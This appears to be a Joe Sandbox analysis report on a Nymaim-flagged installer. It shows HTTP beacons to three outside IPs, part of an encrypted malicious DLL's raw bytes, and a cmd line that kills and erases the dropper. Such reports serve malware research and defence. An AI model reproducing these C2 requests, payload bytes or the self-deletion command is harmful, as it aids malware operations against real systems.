                                        Jan 5, 2023 08:47:31.374835014 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:33.465759993 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:33.493500948 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:33.858603001 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:33.858731031 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:36.415440083 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:36.443062067 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:36.810410976 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:36.812172890 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:40.281857967 CET4970580192.168.2.545.139.105.171
                                        Jan 5, 2023 08:47:40.281939983 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:40.282066107 CET4970780192.168.2.5171.22.30.106
                                        • 45.139.105.171
                                        • 107.182.129.235
                                        • 171.22.30.106
                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.54970545.139.105.17180C:\Program Files (x86)\Split Files\SplitFiles131.exe
                                        TimestampkBytes transferredDirectionData
                                        Jan 5, 2023 08:47:09.800462008 CET93OUTGET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 1
                                        Host: 45.139.105.171
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 5, 2023 08:47:09.836986065 CET93INHTTP/1.1 200 OK
                                        Date: Thu, 05 Jan 2023 07:47:09 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.549706107.182.129.23580C:\Program Files (x86)\Split Files\SplitFiles131.exe
                                        TimestampkBytes transferredDirectionData
                                        Jan 5, 2023 08:47:09.925610065 CET94OUTGET /storage/ping.php HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 0
                                        Host: 107.182.129.235
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 5, 2023 08:47:09.952980042 CET94INHTTP/1.1 200 OK
                                        Date: Thu, 05 Jan 2023 07:47:09 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 17
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 55 77 55 6f 6f 6f 49 49 72 77 67 68 32 34 75 75 55
                                        Data Ascii: UwUoooIIrwgh24uuU
                                        Jan 5, 2023 08:47:09.990287066 CET95OUTGET /storage/extension.php HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 1
                                        Host: 107.182.129.235
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 5, 2023 08:47:10.017687082 CET96INHTTP/1.1 200 OK
                                        Date: Thu, 05 Jan 2023 07:47:09 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Pragma: public
                                        Expires: 0
                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                        Cache-Control: private
                                        Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                        Content-Transfer-Encoding: binary
                                        Content-Length: 94224
                                        Keep-Alive: timeout=5, max=99
                                        Connection: Keep-Alive
                                        Content-Type: application/octet-stream
                                        Data Raw: f9 f1 a9 b8 8b 6d 69 b2 02 e6 7d 3b a6 18 dc 46 22 cd 29 c1 54 8d 11 27 4b 3b 1b ff ec e2 4f bb 59 30 3a cd fb c8 c6 19 33 6a e8 b1 5c 17 49 6a ea 32 52 c5 89 50 17 fc 06 dd 43 07 19 e2 71 a9 7c d1 32 a8 0e fe be ec b3 69 52 32 57 f5 46 e8 b4 ab 43 3d 4d 55 b9 a4 16 cb 8b 9e 85 48 36 99 ea f5 41 e4 94 1a 97 d3 d7 40 7f fa 4f a6 63 1a 89 89 4d 87 78 38 ce 94 d2 e4 b0 4c ae e0 2d 20 c9 88 ab 62 96 84 7c 12 43 b2 c0 e7 8e a4 5a 7d a5 77 d7 94 2e d1 6c 1a 61 cd 61 54 b4 87 c2 a5 62 72 2c 19 c8 18 36 77 23 06 6a c2 50 d9 8c 6c 69 f4 88 3d fc b4 ca 1b 0e c0 6f ac 1e b2 92 93 cf ee 53 e9 7b ab eb 52 94 a4 e6 e4 2e 94 d9 d2 35 d5 a0 15 92 ec a7 23 3b 93 d0 94 82 04 2d fb d3 f1 e8 62 2b 19 e3 8b 47 28 90 3e cb 02 51 05 b9 e0 f5 a5 69 4e 7b 90 2b 79 0c 1d d0 5a 43 e7 ae 7a 33 73 45 cd f0 ae fa 54 0d d3 32 df 4a 10 84 ce 33 bf 39 55 d6 34 26 f6 b2 50 d4 e5 c7 c7 cb d7 b0 e1 89 22 77 49 fa a4 b9 cb e0 40 cb c3 b5 ae da 78 25 3e 90 be 44 0e d5 80 27 7a 09 5e fb 01 d3 d4 5e 28 bc 07 0d a4 87 4e 43 ca 5b 5b 6b d9 0a ba c8 f0 ff 95 eb ca 9c d2 56 5d 47 f1 d2 29 65 0f 7f b4 94 bf 60 c5 c5 d4 ea b1 07 18 ee 4b 2f 4c d0 55 6c 12 19 46 1f 15 22 8a ed 38 24 16 41 64 ef fa aa e4 3a 69 b5 67 a6 f4 30 81 64 db 0f d8 5b 2e a9 cf 54 22 6c 90 55 c0 4d 00 3d 17 30 b1 b0 ef 2c de d9 2c e7 99 83 6b 75 d4 57 2c c3 d1 f7 f9 f3 37 60 51 cf 46 69 3d 77 13 f9 e3 75 f1 dc 3a 8f 97 51 2d ca 52 a0 7d 30 1c c8 eb ac 4c ba ad 82 8f bd 6e c9 0a 1c 74 a4 6e 76 c0 1f eb 06 07 7a c3 c0 18 0c 65 9e e8 49 c0 43 00 01 b3 b6 d2 39 bf 56 8c 7e 31 2b 5b 5d 06 cb 9f 37 f5 04 af 78 51 1d e7 a4 f8 12 02 f6 b0 06 24 81 4c 00 1c 6f e9 65 51 c7 86 2f c8 62 c9 82 f8 5a 96 0c e4 de c1 e4 70 5d 96 3b 69 2a 29 d1 a6 bd 96 23 b9 62 ef 14 f0 25 31 95 ea 11 0d 8c db bf ec f8 40 a0 17 82 47 ff e1 5b 02 97 d9 b7 9b a6 85 0d 2f 00 63 ca 8e 5a 19 f7 ea 08 d1 81 f4 47 95 3a 0f a1 6e 90 a8 45 d3 69 08 4f af 9c 6f af 55 1e 42 c9 50 78 d3 de b2 de 0b 31 7b 2c 61 10 da cf f3 f6 23 6b cd ad 64 6a be ed 4c 34 cc 0f d2 7d da 64 3c 95 14 a4 a8 d5 d9 49 79 79 c4 a0 4a a7 fb 66 ee 57 c4 10 2c 5e 76 56 da 41 6f d4 4b d4 22 2b 4f 58 38 21 46 a7 02 f1 59 50 8b ea bd f5 75 b6 2d e6 ed 42 69 6b eb a5 5b e2 75 05 9b c1 26 57 74 bc 84 50 af f4 7f 6d cf 00 10 8e 5e 20 c8 9a c9 6b 7e e2 01 2e a3 90 6c fe d3 6f a6 7a 4d 56 1c 21 73 2e ed b6 68 80 f0 c3 7b 0f 6e 32 3b 7a d7 d9 cc 4b db 04 3f 53 c5 93 f4 2d 96 0d f9 65 57 e0 e0 ac cf 63 dc fa f2 1b e6 2d 56 dd 62 67 ff ff 39 da 49 c5 05 67 ba 78 fa 67 cb b7 ba ef 7d c3 27 e6 35 d2 c0 28 2a 50 b3 e8 b7 93 c8 4a 23 97 18 3a b5 49 53 b4 08 44 7d 8e 76 8a 97 c3 09 ea 9d 15 6a 4b 39 03 4c 51 46 aa 0f 00
                                        Data Ascii: mi};F")T'K;OY0:3j\Ij2RPCq|2iR2WFC=MUH6A@OcMx8L- b|CZ}w.laaTbr,6w#jPli=oS{R.5#;-b+G(>QiN{+yZCz3sET2J39U4&P"wI@x%>D'z^^(NC[[kV]G)e`K/LUlF"8$Ad:ig0d[.T"lUM=0,,kuW,7`QFi=wu:Q-R}0LntnvzeIC9V~1+[]7xQ$LoeQ/bZp];i*)#b%1@G[/cZG:nEiOoUBPx1{,a#kdjL4}d<IyyJfW,^vVAoK"+OX8!FYPu-Bik[u&WtPm^ k~.lozMV!s.h{n2;zK?S-eWc-Vbg9Igxg}'5(*PJ#:ISD}vjK9LQF
                                        Jan 5, 2023 08:47:10.017736912 CET98INData Raw: 6f 4f 68 56 80 cb c2 29 e2 a1 68 c5 76 5e 2d 04 d2 46 81 ff 08 3c 8f 84 16 ba bb 56 68 88 31 b9 c0 b3 d7 21 97 b1 05 21 8b c0 0f 42 59 63 04 9a 43 3f 8b f4 44 32 04 a3 b3 c2 c1 32 d5 4b 28 a2 a0 36 f6 19 9a 1b 42 d5 15 bd 92 44 90 aa 61 79 b9 b8
                                        Data Ascii: oOhV)hv^-F<Vh1!!BYcC?D22K(6BDay=|'[1~YB:/A`=FKqTw-blBC:>e5.jNK=ZGj:V.:gP~tm~ "A1jNR[PX~LgT%
                                        Jan 5, 2023 08:47:10.017781973 CET99INData Raw: 20 2f b2 fc fb 3b 22 62 e0 b2 2f c2 80 40 84 cb 02 1f 37 3d 0d 0c 1a 55 11 be 34 89 65 ce bc 3a 9c 5c 05 87 3d bb e8 1a 84 38 46 23 32 4d fc be ea 80 62 5b 19 72 10 35 1e b7 8a 98 4d a2 eb 87 6c 74 d4 1d e4 9d 35 68 f5 a9 e5 08 ea 2b 4d 6b 11 a1
                                        Data Ascii: /;"b/@7=U4e:\=8F#2Mb[r5Mlt5h+Mk>eOk6wB!mMf@yHW0>GX|2";J=MgPAqTW/j*qO}([=|Dltn3)fF@}Mr
                                        Jan 5, 2023 08:47:10.017816067 CET100INData Raw: a7 85 09 11 e8 87 fa 45 9c 6e e3 22 3a 8b 3a 37 cb 18 c6 c9 0c 95 19 a5 fd b0 6a 49 fe 1b fe ae 5a 87 a0 39 48 bd 07 52 c2 4c a3 6c d5 9e 43 04 16 b3 be ff 0d 7e 75 6b 76 df 83 39 76 49 20 81 05 f4 44 2b 77 e4 4d b2 06 16 49 eb 4f 6e 06 26 32 98
                                        Data Ascii: En"::7jIZ9HRLlC~ukv9vI D+wMIOn&2wSCi-Mxyi=&{32cT[\wc70#q6F=hbB4P\U8BOpw0IZdET,.k]N{S!d*$;q,
                                        Jan 5, 2023 08:47:10.017849922 CET102INData Raw: 4d 96 87 7f 63 be 6a e0 a7 12 2c 76 97 11 b2 61 1a 8c 52 86 70 00 11 79 15 ef 90 33 7a 8b 69 b8 d1 93 89 5d 20 a4 63 5d de 1c 51 fe 73 46 db 21 4d c9 ea f7 67 60 2f e1 a9 04 18 e8 c1 d7 b3 44 78 0e 75 21 3a 8b 07 a0 01 19 e6 77 51 13 23 87 dc 93
                                        Data Ascii: Mcj,vaRpy3zi] c]QsF!Mg`/Dxu!:wQ#[Xs~w0)w(cU6@(R*#a0Sj!P[N^/c&;<5`V(Tys6gMn ?.Vz*]X6?hGynK;YVYK
                                        Jan 5, 2023 08:47:10.017884970 CET103INData Raw: 21 b9 4c 3c 58 1f 3e b0 46 f6 ca 4f d4 3b 5d 88 04 a1 eb 28 78 da b0 51 20 02 9f d0 8e b2 b6 6e de 77 3f 8e 24 81 58 61 dc f1 2f 50 d4 78 14 e3 ed 48 fd 34 28 b3 3c 8d c4 b1 fb b3 81 1a a3 cc 05 30 f2 1b f9 e2 ee 54 f2 cb e6 99 0e 52 e0 62 83 e1
                                        Data Ascii: !L<X>FO;](xQ nw?$Xa/PxH4(<0TRbY|/V)*s8igrzEm<G_+/G.t#|1;'Ui*9yQYXP^^8]7_Y(*Mt%k+p.(zg
                                        Jan 5, 2023 08:47:10.017935991 CET104INData Raw: 68 3c a5 e0 8c 19 ff b7 b6 66 fd 50 d8 d9 59 25 6f 43 24 25 d2 09 74 d5 15 b3 3e 2c 54 69 50 e7 2e cc 3b db c1 ab f1 19 b7 ff f3 7e 50 4b 36 6e 85 9a 1e 0e d4 5d 9f a5 ae ce 78 88 33 b5 ca 41 3d a1 fd 67 c3 9e 53 a3 30 2c b4 41 90 66 8e 73 85 77
                                        Data Ascii: h<fPY%oC$%t>,TiP.;~PK6n]x3A=gS0,Afswy\cCDw6m&g*}fom?ZIhA/-'1D8$$@S9&h0a7lLl 9W*yu0
                                        Jan 5, 2023 08:47:10.017983913 CET106INData Raw: 24 ad 2e af 1c 5c fa b9 f9 cf 44 8d d0 e8 a4 24 09 87 fb a0 14 ac b1 57 7d 53 55 c3 8d 9b d7 93 44 32 17 30 78 13 2a 5a 0b e8 52 6e 89 17 ad ea 8f 4a 5f d2 cb 2f 97 d7 ed f3 95 a9 50 7f 49 f6 6f 84 95 c0 12 8d 28 dd a7 d0 4c 02 91 fe 7f 5a bd 70
                                        Data Ascii: $.\D$W}SUD20x*ZRnJ_/PIo(LZp1+,j%MClj5NZ32Pu0'1b}V}JCC;H@mX`5Xgw[iag7X"G{K
                                        Jan 5, 2023 08:47:10.018032074 CET107INData Raw: d9 c8 d5 72 52 2b 1f a9 ce 14 25 d2 bc be a1 c8 e3 db 90 60 1d e7 64 da 5b 9b 91 87 b9 96 91 4c f6 68 b8 24 66 6d 17 12 16 9b ce c1 4d ad 21 e8 ac e7 91 d6 2b 8a 70 d8 07 6d f6 7c 51 aa ae 5c 46 a3 5b a8 63 78 5a 2f b7 91 d6 fb a1 2d a8 64 d9 d7
                                        Data Ascii: rR+%`d[Lh$fmM!+pm|Q\F[cxZ/-dIa_hYwOi@{c5$:u[x{'B4oXa\H_f$%^gZr~Q> F>!<}Nw^~a\"[T/B&
                                        Jan 5, 2023 08:47:10.018080950 CET108INData Raw: 20 4c ba 5f 6e 12 80 56 cf 7a 46 07 bc 39 50 89 7d 09 31 b0 10 e3 35 18 30 d6 9b 45 e7 53 0e 8b 5a 89 04 ed 1f 63 58 26 ed 05 56 f6 04 b0 4b 49 41 ec 72 6f 33 13 31 cb 04 d8 ae a2 60 68 7a 07 c2 58 2d 03 77 38 4e e5 40 a5 1d e8 35 b1 0b 06 8e e7
                                        Data Ascii: L_nVzF9P}150ESZcX&VKIAro31`hzX-w8N@5Yf8w}-^)Eja.] )jKNb$Etb6k@+P/zksThrw^NWchEZX(E\8J9alG/Cm-Q95Q@J1_lHl
                                        Jan 5, 2023 08:47:10.045037031 CET110INData Raw: df 45 f8 57 13 1c bc db 95 00 23 48 83 a9 9d cc 72 58 44 3a 28 86 1f 1a ff f8 b0 74 76 a4 81 88 29 df fd 47 64 5f 13 3c 75 e5 f1 4c fe d9 14 bc 60 1b ac a3 1b 17 61 a9 b7 fa 7f c7 86 61 d6 5f f0 b1 f3 ff 55 3d 50 be ad 32 1d c1 19 a0 b5 56 32 5f
                                        Data Ascii: EW#HrXD:(tv)Gd_<uL`aa_U=P2V2_bFM{!wahJs m<'Js{>vB;C+M]5r4:kRP:OjQUFLDQKp+CNZ!cQ:*V


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.549707171.22.30.10680C:\Program Files (x86)\Split Files\SplitFiles131.exe
                                        TimestampkBytes transferredDirectionData
                                        Jan 5, 2023 08:47:10.184628010 CET196OUTGET /library.php HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 2
                                        Host: 171.22.30.106
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 5, 2023 08:47:10.635227919 CET196INHTTP/1.1 200 OK
                                        Date: Thu, 05 Jan 2023 07:47:10 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Jan 5, 2023 08:47:12.711500883 CET197OUTGET /library.php HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 2
                                        Host: 171.22.30.106
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 5, 2023 08:47:13.094685078 CET197INHTTP/1.1 200 OK
                                        Date: Thu, 05 Jan 2023 07:47:12 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=99
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Jan 5, 2023 08:47:15.194849014 CET198OUTGET /library.php HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 2
                                        Host: 171.22.30.106
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 5, 2023 08:47:15.582741022 CET198INHTTP/1.1 200 OK
                                        Date: Thu, 05 Jan 2023 07:47:15 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=98
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Jan 5, 2023 08:47:18.399646997 CET199OUTGET /library.php HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 2
                                        Host: 171.22.30.106
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 5, 2023 08:47:18.811140060 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 05 Jan 2023 07:47:18 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=97
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Jan 5, 2023 08:47:20.899158001 CET200OUTGET /library.php HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 2
                                        Host: 171.22.30.106
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 5, 2023 08:47:21.282871008 CET200INHTTP/1.1 200 OK
                                        Date: Thu, 05 Jan 2023 07:47:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=96
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Jan 5, 2023 08:47:23.423401117 CET200OUTGET /library.php HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 2
                                        Host: 171.22.30.106
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 5, 2023 08:47:23.864329100 CET201INHTTP/1.1 200 OK
                                        Date: Thu, 05 Jan 2023 07:47:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=95
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Jan 5, 2023 08:47:25.946579933 CET201OUTGET /library.php HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 2
                                        Host: 171.22.30.106
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 5, 2023 08:47:26.442823887 CET201INHTTP/1.1 200 OK
                                        Date: Thu, 05 Jan 2023 07:47:25 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=94
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Jan 5, 2023 08:47:28.517307997 CET202OUTGET /library.php HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 2
                                        Host: 171.22.30.106
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 5, 2023 08:47:28.903182030 CET202INHTTP/1.1 200 OK
                                        Date: Thu, 05 Jan 2023 07:47:28 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=93
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Jan 5, 2023 08:47:30.978315115 CET203OUTGET /library.php HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 2
                                        Host: 171.22.30.106
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 5, 2023 08:47:31.374718904 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 05 Jan 2023 07:47:30 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=92
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Jan 5, 2023 08:47:33.465759993 CET204OUTGET /library.php HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 2
                                        Host: 171.22.30.106
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 5, 2023 08:47:33.858603001 CET204INHTTP/1.1 200 OK
                                        Date: Thu, 05 Jan 2023 07:47:33 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=91
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Jan 5, 2023 08:47:36.415440083 CET204OUTGET /library.php HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 2
                                        Host: 171.22.30.106
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 5, 2023 08:47:36.810410976 CET205INHTTP/1.1 200 OK
                                        Date: Thu, 05 Jan 2023 07:47:36 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=90
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:1
                                        Start time:08:47:00
                                        Start date:05/01/2023
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\file.exe
                                        Imagebase:0x400000
                                        File size:2094367 bytes
                                        MD5 hash:E0F8085C7CB8EB9CF1C263BB12CFC6DF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        Target ID:4
                                        Start time:08:47:01
                                        Start date:05/01/2023
                                        Path:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp" /SL4 $902D6 "C:\Users\user\Desktop\file.exe" 1818498 170496
                                        Imagebase:0x400000
                                        File size:778752 bytes
                                        MD5 hash:E8176050192FBB976D70238E3C121F4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Target ID:5
                                        Start time:08:47:04
                                        Start date:05/01/2023
                                        Path:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                                        Imagebase:0x400000
                                        File size:3491315 bytes
                                        MD5 hash:361518D6CC3C25EEC2DFC1DE82B055B2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000005.00000002.372442187.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000005.00000002.372529330.0000000003340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low

                                        Target ID:6
                                        Start time:08:47:08
                                        Start date:05/01/2023
                                        Path:C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x100000
                                        File size:73728 bytes
                                        MD5 hash:3FB36CB0B7172E5298D2992D42984D06
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 50%, ReversingLabs
                                        Reputation:high

                                        Target ID:7
                                        Start time:08:47:39
                                        Start date:05/01/2023
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

